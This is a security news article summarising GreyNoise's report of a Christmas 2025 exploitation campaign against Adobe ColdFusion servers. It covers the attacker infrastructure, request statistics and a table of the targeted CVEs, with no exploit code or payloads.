Pierluigi Paganini
January 03, 2026
GreyNoise reports a coordinated campaign exploiting about a dozen Adobe ColdFusion vulnerabilities, with thousands of attack attempts observed during the Christmas 2025 holiday.
“GreyNoise observed a coordinated exploitation campaign targeting Adobe ColdFusion servers over the Christmas 2025 holiday period.” reads the report published by GreyNoise. “The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited). This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024.”
A single actor, using Japan-based infrastructure, generated about 98% of the traffic and exploited more than 10 ColdFusion CVEs from 2023–2024. The attacks used ProjectDiscovery Interactsh for out-of-band verification, with JNDI/LDAP injection as the main vector. Most activity occurred on Christmas Day, suggesting deliberate timing to exploit reduced security monitoring.
The researchers observed 5,940 malicious requests exploiting ColdFusion vulnerabilities from 2023–2024, peaking on December 25.
Most of the requests targeted servers in the US (4,044), Spain (753), and India (128).
GreyNoise identified a dominant threat actor using two IPs (134.122.136[.]119, 134.122.136[.]96) hosted by CTG Server Limited (AS152194), responsible for nearly all observed ColdFusion exploitation traffic. The two IPs accounted for over 98% of requests, operated concurrently in many cases, shared Interactsh sessions, and showed automated, coordinated behavior cycling through multiple attack types. Minor activity came from a handful of secondary IPs across Canada, India, the US, and Cloudflare. CTG Server Limited, a Hong Kong–registered provider with rapid IP space growth, has prior links to phishing, spam, bogon routing, and weak abuse enforcement, raising concerns about its role as a permissive hosting environment.
Below is the list of targeted ColdFusion vulnerabilities:
| CVE | Type | Requests |
|---|---|---|
| Generic RCE | Remote Code Execution | 1,403 |
| Generic LFI | Local File Inclusion | 904 |
| CVE-2023-26359 | Deserialization RCE | 833 |
| CVE-2023-38205 | Access Control Bypass | 654 |
| CVE-2023-44353 | Remote Code Execution | 611 |
| CVE-2023-38203 | Remote Code Execution | 346 |
| CVE-2023-38204 | Remote Code Execution | 346 |
| CVE-2023-29298 | Access Control Bypass | 342 |
| CVE-2023-29300 | Remote Code Execution | 176 |
| CVE-2023-26347 | Access Control Bypass | 171 |
| CVE-2024-20767 | Arbitrary File Read | 146 |
| CVE-2023-44352 | Reflected XSS | 8 |
Analysis shows the ColdFusion activity was only about 0.2% of a much larger vulnerability scanning campaign conducted from the same two IPs. Overall, the operation generated more than 2.5 million requests, targeting a total of 767 CVEs spanning 2001–2025, with over 1,200 attack signatures and thousands of unique fingerprints and OAST domains.
The campaign focused mainly on reconnaissance, followed by CVE exploitation, LFI, and RCE attempts. It targeted more than 47 technology stacks, including Java application servers, web frameworks, CMS platforms, network devices, and enterprise software. The scale, breadth of CVEs, and automation indicators point to a systematic, template-based reconnaissance effort covering the global vulnerability landscape.
The experts published Indicators of Compromise for this campaign.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Adobe)
